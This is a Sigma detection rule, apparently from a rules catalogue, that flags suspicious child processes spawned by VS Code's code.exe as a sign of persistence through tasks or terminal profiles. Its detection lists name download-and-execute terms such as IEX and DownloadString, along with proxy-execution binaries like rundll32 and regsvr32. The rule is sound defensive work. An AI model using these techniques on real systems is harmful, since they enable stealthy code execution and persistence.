in development environment where vscode is used heavily. false positives may occur when developers use task to compile or execute different types of code. remove or add processes accordingly

t1202
t1218
windows
sigma

Techniques

t1202
t1218

Sample rules

Potentially Suspicious Child Process Of VsCode

source: sigma
technicques:
- t1202
- t1218

Description

Detects uncommon or suspicious child processes spawning from a VsCode “code.exe” process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.

Detection logic

condition: selection_parent and 1 of selection_children_*
selection_children_cli:
  CommandLine|contains:
  - Invoke-Expressions
  - IEX
  - Invoke-Command
  - ICM
  - DownloadString
  - rundll32
  - regsvr32
  - wscript
  - cscript
  Image|endswith:
  - \powershell.exe
  - \pwsh.exe
  - \cmd.exe
selection_children_images:
  Image|endswith:
  - \calc.exe
  - \regsvr32.exe
  - \rundll32.exe
  - \cscript.exe
  - \wscript.exe
selection_children_paths:
  Image|contains:
  - :\Users\Public\
  - :\Windows\Temp\
  - :\Temp\
selection_parent:
  ParentImage|endswith: \code.exe